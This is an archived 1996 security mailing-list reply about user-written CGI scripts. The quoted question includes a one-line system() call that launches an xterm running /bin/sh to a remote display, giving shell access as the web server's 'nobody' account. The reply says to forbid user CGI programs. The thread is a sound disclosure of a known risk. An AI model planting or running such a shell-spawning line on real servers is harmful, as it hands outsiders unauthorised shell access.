[3668] in WWW Security List Archive
Re: Hole: nobody shell
daemon@ATHENA.MIT.EDU (Mark G. Scheuern)
Tue Dec 3 16:44:09 1996
Date: Tue, 3 Dec 1996 14:19:59 -0500 (EST)
From: "Mark G. Scheuern" <mgscheue@Oakland.edu>
To: Andrea Di Fabio <fabio@cs.odu.edu>
cc: www-security@ns2.rutgers.edu
In-Reply-To: <Pine.3.91.961203114100.25652A-100000@pitfall.cs.odu.edu>
Errors-To: owner-www-security@ns2.rutgers.edu
The fix is not to allow such a script. It's a well-known fact that
it's both possible and easy to write CGI programs that do all sorts of
evil things, which is why it's a bad idea to allow users to put their
own CGI programs on a server.
Mark
On Tue, 3 Dec 1996, Andrea Di Fabio wrote:
> I was experimenting with cgi scripts when I came up with this idea:
>
> What if I have a cgi script which does the followin:
> system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")
>
> I can now pop an exterm on my display as nobody.
> This way any user can gain access to the nobody account and
> have fun with it...
>
> Has this been discussed anywhere?
> Is there a fix out there?
>
> fabio.
